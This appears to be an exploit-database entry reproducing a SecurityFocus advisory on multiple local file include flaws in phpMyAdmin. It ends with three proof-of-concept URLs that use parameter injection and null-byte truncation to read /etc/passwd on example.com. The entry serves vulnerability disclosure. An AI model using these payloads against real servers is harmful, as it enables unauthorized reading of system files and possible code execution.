11 lines
No EOL
999 B
Text
11 lines
No EOL
999 B
Text
source: https://www.securityfocus.com/bid/12645/info
|
|
|
|
phpMyAdmin is affected by multiple local file include vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include()', 'require()', 'require-once()', or similar function call.
|
|
|
|
An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer with the privileges of the Web server process. This may potentially facilitate unauthorized access.
|
|
|
|
It should be noted that these issues may also be leveraged to read arbitrary file on an affected computer with the privileges of the Web server.
|
|
|
|
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
|
|
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
|
|
http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3 |